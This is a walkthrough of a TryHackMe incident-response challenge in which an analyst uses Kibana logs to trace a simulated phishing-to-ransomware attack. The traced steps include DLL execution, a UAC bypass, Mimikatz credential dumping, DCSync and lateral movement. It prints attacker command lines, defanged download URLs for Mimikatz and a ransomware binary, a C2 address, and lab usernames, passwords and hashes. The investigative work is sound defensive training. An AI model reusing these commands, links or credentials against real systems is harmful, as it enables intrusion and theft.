Boogey Man 3
TryHackMe Challenge Walkthrough
Challenge Overview
Boogeyman returns, stealthier than before. This time, the attacker compromises a user at Quick Logistics LLC and targets the CEO with a spear-phishing email. The stage 1 payload implants a malicious DLL, establishes persistence, and begins C2 communication. The attacker escalates privileges, dumps credentials using Mimikatz, performs lateral movement using harvested credentials, and finally reaches the Domain Controller (DC) to launch a ransomware attack.
You will investigate the entire attack chain using Kibana in an Elastic Stack environment.
Threat Analysis Summary
Analyst Summary Report
Incident Title
Boogeyman 3 – Multi-Stage Phishing to Ransomware
Category
Lateral Movement, Credential Access, Impact
Detection Source
Endpoint logs via Kibana (Elastic Agent)
Impact
Domain-wide compromise via staged malware, credential dumping, and ransomware deployment
Tools Used
- Kibana
Chain Attack Overview
Initial Access
Malicious .hta file disguised as PDF, launched via mshta.exe
Execution
DLL payload executed via rundll32.exe, later stages via powershell.exe
Persistence
Scheduled task with daily execution at 6:00
Privilege Escalation
fodhelper.exe used to bypass UAC
Defense Evasion
Not observed
Discovery
Recon with whoami, net.exe, PowerView, and share enumeration
Credential Access
mimikatz.exe used on two workstations and the domain controller
Lateral Movement
Remote PowerShell sessions to WKSTN-1327 via stolen credentials
Exfiltration
Not observed
Command & Control
HTTP connection from review.dat to 165.232.170.151:80
Impact
Ransomware dropped via PowerShell from public URL
MITRE ATT&CK Mapping
| Phase | ID | Technique | Description |
|---|---|---|---|
| Initial Access | T1204.002 | User Execution: Malicious File | .hta disguised as PDF executed via mshta.exe |
| Execution | T1050.001 | Command and Scripting Interpreter: PowerShell | PowerShell used to create tasks, download tools |
| Execution | T1218.011 | Signed Binary Proxy Execution: Rundll32 | Executed malicious DLL via rundll32.exe |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Task named review for persistence |
| Privilege Escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass UAC | fodhelper.exe used to escalate privileges |
| Discovery | T1087.002 | Account Discovery: Domain Account | PowerView and net.exe used for enumeration |
| Lateral Movement | T1021.006 | Remote Services: Windows Remote Management | Used stolen creds to move via wsmprovhost.exe |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | mimikatz.exe used on multiple machines |
| Credential Access | T1003.006 | DCSync | Mimikatz DCSync used on domain controller |
| C2 | T1071.001 | Application Layer Protocol: Web Protocols | HTTP connection to external IP |
| Impact | T1486 | Data Encrypted for Impact | Ransomware executed via downloaded binary |
Reference: [MITRE ATT&CK Navigator] ( https://attack.mitre.org/ )
Q & A
Q1: **What is the PID of the process that executed the initial stage 1 payload?**
First things first, set the date!
Open Kibana, go to the “Discover” tab, and set the date filter between August 29–30, 2023.
The initial access method was spear phishing email with an attachment, a file containing a “PDF” file — ProjectFinancialSummary_Q3.pdf.
Kibana Query:
ProjectFinancialSummary_Q3.pdf
To trace the execution chain, I added the following columns:
- process.pid
- process.parent.pid
- process.name
- process.command_line
From the logs, we see that mshta.exe launches the disguised script on host WKSTN-0051 under the user evan.hutchinson, kicking off a chain of events including xcopy, rundll32, and powershell.
Answer
6392
Q2: The stage 1 payload attempted to implant a file to another location. What is the full command-line value of this execution?
The full command-line tells us everything we need:
- it copies review.dat from the D: drive (mounted by the attacker) into the user’s Temp folder using the shortname path.
Answer
“C:\Windows\System32\xcopy.exe” /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat
Q3: The implanted file was eventually used and executed by the stage 1 payload. What is the full command-line value of this execution?
Next up, the attacker gets rundll32.exe involved — the Swiss Army knife of malicious execution. Still parented by mshta.exe, just to keep things consistent.
They launch review.dat directly from the mounted D: drive, using the DllRegisterServer export function — a classic move for running rogue DLLs.
Answer
“C:\Windows\System32\rundll32.exe” D:\review.dat,DllRegisterServer
Q4: The stage 1 payload established a persistence mechanism. What is the name of the scheduled task created by the malicious script?
Because nothing says “I’m here to stay” like a scheduled task named after the very DLL you just dropped.
Right after executing review.dat, the attacker uses PowerShell to schedule it for a daily 6:00 AM surprise. It’s subtle. Like using a chainsaw to pick a lock.
Answer
review
Q5: The execution of the implanted file inside the machine has initiated a potential C2 connection. What is the IP and port used by this connection? (format: IP:port)
We traced review.dat running at 23:51:16.809
We are looking for network connection now, so let’s use Sysmon Event.ID 3 (network connection) and check what happened after.
Kibana Query:
event.provider : "Microsoft-Windows-Sysmon" and event.code : "3"
A second later, Sysmon Event ID 3 logs an outbound connection — because what’s malware without phoning home?
Filter for network connections and it’s hard to miss: nearly all traffic heads to the same place. Subtlety not included.
(ip is defanged)
Answer
165[.]232[.]170[.]151:80
Q6: The attacker has discovered that the current access is a local administrator. What is the name of the process used by the attacker to execute a UAC bypass?
Now we search for review.dat on WKSTN-0051 and followed the process chain like responsible analysts pretending we don’t already know where this is going.
After a quick warm-up with whoami and net.exe, the attacker pulls out fodhelper.exe
Checking online we can easily find that fodhelper.exe is used for UAC bypass.
On MITRE ATT&CK we can see find the technique:
- T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
So its a classic LOLBin used for UAC bypass. Because when you’re trying to stay sneaky, abusing trusted Windows tools is the way to go.
Note: The last of our event log show even an attack with a plaintext credential and an encoded text.
The process.pid its 6160, i guess if we look for process chained to it we can see what its going to happen.
The event log gets more interesting from here. Process PID 6160 kicks off a whole parade:
- cmd.exe running whoami /all to verify access (or just to flex).
- PowerView downloaded straight from GitHub. Nothing suspicious about that.
- Mimikatz arrives for credential dumping — enter itadmin.
- A bit of network recon with invoke-shareFinder.
- Browsing remote shares like it’s a mapped drive from 2003.
- Pulls IT_Automation.ps1 from \\WKSTN-1327\ITFiles, because of course he does.
- Uses freshly dumped creds to hop onto WKSTN-1327 like it’s a hotel room.
- And finally, kicks off another round of plaintext+encoded credential attacks on the new host.
All this, just because someone opened a malicious PDF-that’s-actually-an-HTA.
The process.pid its 6160, i guess if we look for process chained to it we can see what its going to happen.
Answer
fodhelper.exe
Q7: Having a high privilege machine access, the attacker attempted to dump the credentials inside the machine. What is the GitHub link used by the attacker to download a tool for credential dumping?
If you guessed Mimikatz, congratulations — you’ve been here before.
Following the command chain from the previous question, the attacker decided it was time for some light credential theft and downloaded mimikatz_trunk.zip directly from GitHub. Because if you’re going to dump LSASS, you might as well do it with flair and an open-source license.
Also, shoutout to defenders who still don’t block GitHub — you’re making life a little easier for the bad guys
(URL is defanged)
Answer
hxxps[://]github[.]com/gentilkiwi/mimikatz/releases/download/2[.]2[.]0-20220919/mimikatz_trunk[.]zip
Q8: After successfully dumping the credentials inside the machine, the attacker used the credentials to gain access to another machine. What is the username and hash of the new credential pair? (format: username:hash)
As expected, post-Mimikatz activity leads to some credential dumping. We spot the IT Admin’s hash sitting right there in the logs — like it’s not about to be abused immediately for lateral movement.
Answer
itadmin:F84769D250EB95EB2D7D8B4A1C5613F2
Q9: Using the new credentials, the attacker attempted to enumerate accessible file shares. What is the name of the file accessed by the attacker from a remote share?
With shiny new creds in hand, the attacker launched Invoke-ShareFinder to scout the environment like a nosy neighbor with admin rights.
Soon enough, they landed on a file share and went straight for a suspicious-looking PowerShell script. Because if you’re going to dig, dig where it hurts.
Answer
IT_Automation.ps1
Q10: After getting the contents of the remote file, the attacker used the new credentials to move laterally. What is the new set of credentials discovered by the attacker? (format: username:password)
Apparently, IT_Automation.ps1 didn’t just automate tasks — it also conveniently handed over hardcoded credentials. Because who doesn’t love storing plaintext passwords in scripts?
Answer
QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987
Q11:What is the hostname of the attacker's target machine for its lateral movement attempt?
After grabbing the credentials, the attacker pivots to a new target machine — because why stop at one when you can have more?
From the logs, we see lateral activity directed toward a system identified as:
Answer
WKSTN-1327
Q12: Using the malicious command executed by the attacker from the first machine to move laterally, what is the parent process name of the malicious command executed on the second compromised machine?
To confirm the attacker’s activity on the second host, I filtered for:
Kibana Query:
agent.hostname:"WKSTN-1327" AND user.name:"allan.smith"
Filter for process.command_line: exists to make the reading easier
That gave us a beautiful trace of remote command execution. The key detail? The malicious PowerShell was spawned under: – wsmprovhost.exe
again:
- recon with whoami
- another time download of mimikatz e and we know how those stuff ends
Answer
wsmprovhost.exe
Q13: The attacker then dumped the hashes in this second machine. What is the username and hash of the newly dumped credentials? (format: username:hash)
No surprises here — after Mimikatz showed up on the second host, we got our next set of stolen creds.
Just scrolling through the same command-line logs on WKSTN-1327, we find the juicy part:
- Mimikatz runs (again)
- Another dump appears, and voilà:
Answer
administrator:00f80f2538dcb54e7adc715c0e7091ec
Q14: After gaining access to the domain controller, the attacker attempted to dump the hashes via a DCSync attack. Aside from the administrator account, what account did the attacker dump?
Time to shift our focus to the DC01 host
I checked online to be sure, and a common DCSync attack method is Mimikatz
Since DCSync attacks often involve Mimikatz, I filtered for events where the process name is mimikatz.exe on agent.hostname:DC01.
Kibana Query:
agent.hostname:"DC01" AND process.name: "mimikatz.exe"
Sure enough, the logs show our attacker pulling password hashes like it’s their birthday.
Answer
backupda
Q15: After dumping the hashes, the attacker attempted to download another remote file to execute ransomware. What is the link used by the attacker to download the ransomware binary?
Let’s have a broader vision on this DC01, check the powershell excution on it, since that’s their favorite tool at this point.
We expect to have some invoke-command along with this download.
Kibana Query:
agent.hostname:"DC01" AND process.name: "powershell.exe"
With control of the domain controller and a pocketful of hashes, our attacker moved on to the grand finale: ransomware.
And there it is — a nice, cozy Invoke-WebRequest pulling down something lovingly named ransomboogey.exe from a remote server. Totally normal behavior.
(url is defanged)
Answer
hxxp[://]ff[.]sillytechninja[.]io/ransomboogey[.]exe
Conclusion
From fake PDFs to credential dumping and domain-wide ransomware — this one had it all. Our attacker used LOLBins like mshta, rundll32, and fodhelper to keep things subtle, until Mimikatz and PowerShell joined the party. Classic escalation. Classic mess.
The good news? The entire attack left a trail wide enough to follow in flip-flops. Assuming you’re looking, of course.
$ Whoami
Cybersecurity learner, log nerd, and TryHackMe badge hoarder. Let’s connect on LinkedIn before I get pulled into another packet capture.